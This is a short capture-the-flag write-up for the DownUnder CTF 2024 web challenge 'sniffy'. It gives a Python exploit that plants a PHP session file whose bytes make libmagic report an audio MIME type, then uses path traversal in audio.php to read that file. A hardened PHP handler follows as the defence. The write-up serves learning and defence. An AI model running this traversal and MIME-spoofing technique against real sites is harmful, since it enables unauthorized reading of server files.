MIME Spoofing + PHP

Lessons learned from DownUnder CTF 2024: [WEB] sniffy

import requests

# Session id we control; PHP's default file-based session handler stores
# this session as /tmp/sess_abcd on the server.
cookies = {
	'PHPSESSID': 'abcd'
}

# The 'theme' value is written verbatim into the session file. Padding with
# 0-3 bytes of 'a' shifts the repeated 'M.K.' pattern so that, for one of the
# four alignments, 'M.K.' lands exactly at offset 1080, which libmagic treats
# as the Amiga MOD signature and reports as an audio MIME type.
for i in range(4):
	r = requests.get('http://localhost:8080/', params={'theme': 'a' * i + 'M.K.' * 300}, cookies=cookies)
	# audio.php only sniffs the MIME type; the traversal in 'f' reaches the session file.
	r = requests.get('http://localhost:8080/audio.php', params={'f': '../../../../tmp/sess_abcd'})
	if r.status_code != 403:
		print('found')
		print(r.text)

Note: remember that PHP's default file-based session storage is /tmp/sess_<PHPSESSID>, so the session file name is attacker-chosen.
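A hardened version of the audio.php handler, written here as an added example (not the challenge's own code): it assumes the audio files live in /var/www/html/audio and that the handler takes ?f=<name>. The path restriction is what stops the session-file read; the MIME sniff stays as a secondary check only, since the bytes in a file are attacker-controlled.

```php
<?php
// Added example, not the challenge's code. Assumes PHP 8 (str_contains,
// str_starts_with) and that audio files live in AUDIO_DIR.
declare(strict_types=1);

const AUDIO_DIR = '/var/www/html/audio';
const ALLOWED_MIME = ['audio/mpeg', 'audio/wav', 'audio/ogg'];

function resolve_audio_path(string $requested): ?string
{
    // 1. Accept only a plain file name: no '/', no '..', no NUL, no empty string.
    if ($requested === ''
        || !preg_match('/^[A-Za-z0-9._-]+$/', $requested)
        || str_contains($requested, '..')) {
        return null;
    }
    // 2. Canonicalise and require the result to stay inside AUDIO_DIR.
    //    realpath() resolves symlinks and '..', so a traversal to
    //    /tmp/sess_<id> fails this check whatever its contents look like.
    $base = realpath(AUDIO_DIR);
    $path = realpath(AUDIO_DIR . '/' . $requested);
    if ($base === false || $path === false || !str_starts_with($path, $base . '/')) {
        return null;
    }
    // 3. MIME sniffing only as a defence-in-depth allowlist; it is never the
    //    authorisation decision, because 'M.K.' at offset 1080 is enough to
    //    make libmagic call arbitrary attacker bytes an audio file.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($path);
    if (!in_array($mime, ALLOWED_MIME, true)) {
        return null;
    }
    return $path;
}

$path = resolve_audio_path($_GET['f'] ?? '');
if ($path === null) {
    http_response_code(403);
    exit;
}
header('Content-Type: ' . (new finfo(FILEINFO_MIME_TYPE))->file($path));
readfile($path);
```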

https://github.com/waviq/PHP/blob/master/Laravel-Orang1/public/filemanager/connectors/php/plugins/rsc/share/magic.mime

https://www.garykessler.net/library/file_sigs.html